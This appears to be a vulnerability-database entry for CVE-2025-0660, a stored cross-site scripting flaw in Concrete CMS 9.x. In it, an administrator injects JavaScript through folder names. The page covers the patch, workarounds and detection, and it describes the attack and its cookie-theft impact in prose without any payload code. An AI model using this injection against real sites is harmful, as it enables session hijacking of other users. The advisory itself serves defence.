Login Sign Up

CVE-2025-0660

4.8 MEDIUM
Cross-Site Scripting

📋 TL;DR

Concrete CMS versions 9.0.0 through 9.3.9 contain a stored cross-site scripting (XSS) vulnerability in the 'Add Folder' functionality. A rogue administrator can inject malicious JavaScript as folder names, which executes when other users view the folder. Only Concrete CMS 9.x installations with compromised admin accounts are affected.

💻 Affected Systems

Products:
  • Concrete CMS
Versions: 9.0.0 through 9.3.9
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Versions below 9.x are not affected. Requires admin-level access to exploit.

📦 What is this software?

Concrete Cms by Concretecms

View all CVEs affecting Concrete Cms →

⚠️ Risk & Real-World Impact

🔴

Worst Case

A rogue administrator could steal session cookies, perform actions as other users, or redirect users to malicious sites through persistent XSS payloads in folder names.

🟠

Likely Case

Limited impact since it requires admin privileges; most likely used for session hijacking or defacement within the CMS interface.

🟢

If Mitigated

With proper admin account security and input validation, impact is minimal as it requires privileged access.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires admin privileges and knowledge of the vulnerability. No public exploit code identified.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 9.3.10

Vendor Advisory: https://documentation.concretecms.org/9-x/developers/introduction/version-history/940-release-notes

Restart Required: No

Instructions:

1. Backup your Concrete CMS installation and database. 2. Update to version 9.3.10 or later via the built-in updater or manual installation. 3. Verify the update completed successfully.

🔧 Temporary Workarounds

Input Validation for Folder Names

all

Implement custom input validation to sanitize folder names before storage.

Restrict Admin Privileges

all

Review and limit admin accounts to only trusted personnel.

🧯 If You Can't Patch

  • Implement strict Content Security Policy (CSP) headers to mitigate XSS impact.
  • Monitor admin account activity and folder creation logs for suspicious behavior.

🔍 How to Verify

Check if Vulnerable:

Check Concrete CMS version in admin dashboard or via version file. If version is between 9.0.0 and 9.3.9 inclusive, system is vulnerable.

Check Version:

Check /concrete/config/concrete.php or admin dashboard for version number.

Verify Fix Applied:

After updating, verify version is 9.3.10 or higher. Test 'Add Folder' functionality with basic XSS payloads to ensure sanitization.

📡 Detection & Monitoring

Log Indicators:

  • Unusual folder creation events by admin users
  • Folder names containing JavaScript or HTML tags in logs

Network Indicators:

  • Unexpected JavaScript execution in CMS interface
  • Requests to external domains from folder pages

SIEM Query:

Search for 'folder creation' events with payload-like strings in folder name field.

📊 Metadata

CVE ID: CVE-2025-0660
CVSS v3 Score: 4.8 (MEDIUM)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-20
EPSS Score: 0.15% exploit probability (35.6th percentile)
Published: March 10, 2025
Last Updated: September 4, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-0660, you might also want to check these:

CVE-2022-47190 10.0

CVE-2022-47190 allows remote attackers to upload malicious firmware containing a webshell to Generex...

Same vulnerability type (CWE-20)
CVE-2024-3400 10.0

CVE-2024-3400 is a critical command injection vulnerability in Palo Alto Networks PAN-OS GlobalProte...

Same vulnerability type (CWE-20)
CVE-2023-42802 10.0

This critical vulnerability in GLPI allows attackers to upload malicious PHP files to unauthorized d...

Same vulnerability type (CWE-20)